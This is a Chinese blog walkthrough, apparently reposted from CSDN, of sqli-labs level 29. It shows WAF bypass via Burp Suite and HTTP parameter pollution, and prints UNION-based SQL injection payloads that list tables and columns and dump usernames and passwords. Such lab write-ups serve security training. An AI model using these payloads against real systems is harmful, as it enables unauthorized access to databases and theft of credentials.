当前位置:网站首页>sqlilabs less-29

sqlilabs less-29

2022-07-25 05:35:00 永远是深夜该多好。

sqlilabs less-29

前期判断

一进来就看到说有WAF,赶紧去试试拦截了什么。
在这里插入图片描述

在这里插入图片描述
感觉不对啊,这防火墙是不是出问题了。在这里插入图片描述
看起来真出问题了,赶紧去看看源码,index.php的文件就是本界面,可以看出来没有任何过滤。
在这里插入图片描述
还有两个分别是诸如被拦截的页面和有防火墙的页面。
在这里插入图片描述
诸如被拦截的界面。
在这里插入图片描述
有WAF的界面。
在这里插入图片描述
测试发现大部分符号都被拦截了。

注入

方法一:中间人

突然有几个问题,是否为前端判断,能否用中间人方法绕过WAF,抓包丢进burp suite的Repeater里面测试一下,能看到貌似绕过了WAF。
在这里插入图片描述

在这里插入图片描述

英文单引号注入,注意在burpsuite里面id=后面的参数之间不能有空格,要不然burpsuite会认为用空格相隔的就不是参数,就会出现错误请求。
在这里插入图片描述

简而言之就是想办法让id=后面的参数都是同一个颜色(此处是绿色),这应该是众多方法之一。
在这里插入图片描述

判断行数。
在这里插入图片描述

判断表名。

-1'union(select(1),2,group_concat(table_name)from(information_schema.tables)where(table_schema=database()))--+

在这里插入图片描述

判断列名。

-1'union(select(1),2,group_concat(column_name)from(information_schema.columns)where(table_name='users'))--+

在这里插入图片描述

-1'union(select(1),group_concat(username),group_concat(password)from(users))--+

在这里插入图片描述

方法二:

先测试一下看看那些字符没有被拦截,以便利用。
在这里插入图片描述
发现"&",没有被过滤,该怎么利用呢。
可以看到本来被过滤的字符跟在&后面就能够使用了。在这里插入图片描述

表名。

1&id=-1' union select null,null,group_concat(table_name) from information_schema.tables where table_schema=database()--+

在这里插入图片描述

原网站

版权声明
本文为[永远是深夜该多好。]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_37370714/article/details/125958894

边栏推荐

猜你喜欢

随机推荐